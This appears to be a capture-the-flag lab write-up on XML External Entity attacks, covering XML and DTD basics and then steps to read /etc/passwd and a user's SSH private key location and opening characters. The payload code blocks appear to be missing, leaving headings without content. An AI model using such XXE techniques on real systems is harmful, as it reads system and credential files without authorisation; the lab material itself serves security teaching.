XML External Entity
Date: 29, December, 2020
Author: Dhilip Sanjay S
What is XML?
eXtensible Markup Language - defines a set of rules for encoding documents in a format that is both human and machine readable.
It is a markup language used for storing and transporting data.
Why use XML?
Platform and programming language independent.
Data can be changed at any point in time without affecting the data presentation.
XML allows validation using DTD (Document Type Definition) and Schema.
Syntax
XML Prolog is used to specify XML version and encoding in XML document:
XML document must contain a root element. If ther is no root element, then it would be considered wrong or invalid XML doc:
mail
- root elementto
,from
,text
- children element
XML is case-sensitive language.
XML elements can have attributes (similar to HTML):
category
- attributemessage
- attribute value
XML External Entity - DTD (Document Type Definition)
DTD defines the structure and the legal elements and attributes of an XML document.
P.S: HTML has pre-defined tags and attributes, whereas in XML, we define the elements and attributes using DTD.
Internal and External DTD declaration.
note.dtd
XML document that uses note.dtd
Understanding how DTD validates the XML:
!DOCTYPE note
- deines a root element of the document named note.!ELEMENT note
- defines that note element must contain the elements : "to, from, heading, body".!ELEMENT to (#PCDATA)
- defines to element to be of type #PCDATA!ELEMENT from (#PCDATA)
- defines to element from be of type #PCDATA!ELEMENT heading (#PCDATA)
- defines to element heading be of type #PCDATA!ELEMENT body (#PCDATA)
- defines to element body be of type #PCDATA
Note:
#PCDATA
- Parseable Character Data.
Entities
Entities in DTD
Entity usage in XML
External Entities
External entity in DTD
XXE Attack
XXE attack is a vulnerability that absuses features of XML parsers/data.
Denial of Service
Server-Side Request Forgery
Enable port scanning
Remote code Execution
Two types of XXE attacks
In-band XXE: Attacker can receive an immediate response to the XXE payload.
Out-of-band XXE (Blind XXE): No immediate response from the web application. Attacker has to reflect the output of their XXE payload to some other file or their own server.
XXE Payload
To verify that XML is parsed:
XXE to read some file from the system by suing ENTITY and SYSTEM keywords:
XXE Exploiting
Try to display your own name using any payload.
See if you can read the /etc/passwd
Answer:
Steps to Reproduce:
What is the name of the user in /etc/passwd
Answer: falcon
Where is falcon's SSH key located?
Answer: /home/falcon/.ssh/id_rsa
Usually the ssh keys are stored in
id_rsa
file of the respective user's.ssh
folder by default.
What are the first 18 characters for falcon's private keys
Answer: MIIEogIBAAKCAQEA7b
Steps to Reproduce:
Output:
Put it inside a file and then use head command to get the first 18 characters:
head -c 18 <FILE>
Last updated